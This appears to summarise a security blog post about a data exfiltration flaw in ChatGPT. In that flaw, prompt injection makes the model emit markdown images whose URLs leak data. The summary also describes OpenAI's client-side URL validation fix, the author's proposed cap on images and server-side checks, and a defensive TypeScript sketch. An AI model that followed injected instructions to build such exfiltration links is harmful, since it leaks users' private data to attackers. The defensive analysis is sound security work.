The author suggests further improvements, such as limiting the number of images rendered per response and performing security checks server-side to benefit all clients. Despite these concerns, the author acknowledges the mitigation as a step in the right direction and encourages OpenAI to continue improving security measures.
Key takeaways:
- OpenAI has implemented mitigation steps to address a data exfiltration vulnerability in ChatGPT, one that attackers could exploit by abusing image markdown rendering during prompt injection attacks.
- The mitigation is a client-side call to a validation API that checks whether a URL is safe before the client decides to render the image.
- The fix is not perfect, however, and still allows some data to leak. The author suggests limiting the number of images that can be rendered per response to further blunt potential bypasses.
- The current iOS client lacks these improvements, and the author argues that security checks should be performed server-side so that every client benefits from them automatically.
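The two client-side ideas above (vet each URL before rendering, and cap how many images a single response may render) can be sketched roughly as follows. This is a hedged illustration, not OpenAI's actual implementation: the function names, the injected `UrlSafetyCheck` callback, and the `MAX_IMAGES_PER_RESPONSE` value are all assumptions made for the example.

```typescript
// Hypothetical signature for a call to a URL-validation endpoint.
// In a real client this would wrap an HTTP request to the safety API.
type UrlSafetyCheck = (url: string) => Promise<boolean>;

// Assumed cap, not a documented value: limits exfiltration bandwidth
// even if individual URLs slip past the safety check.
const MAX_IMAGES_PER_RESPONSE = 3;

// Given the image URLs found in a response, return only those that
// should actually be rendered: each must pass the safety check, and
// no more than MAX_IMAGES_PER_RESPONSE are allowed through.
async function filterRenderableImages(
  urls: string[],
  isUrlSafe: UrlSafetyCheck,
): Promise<string[]> {
  const renderable: string[] = [];
  for (const url of urls) {
    if (renderable.length >= MAX_IMAGES_PER_RESPONSE) break; // per-response cap
    if (await isUrlSafe(url)) {
      renderable.push(url); // render only vetted URLs
    }
  }
  return renderable;
}
```

A client would call this with its real safety-API wrapper; note that performing the same filtering server-side, as the author recommends, would cover clients (such as the iOS app) that have not shipped this logic.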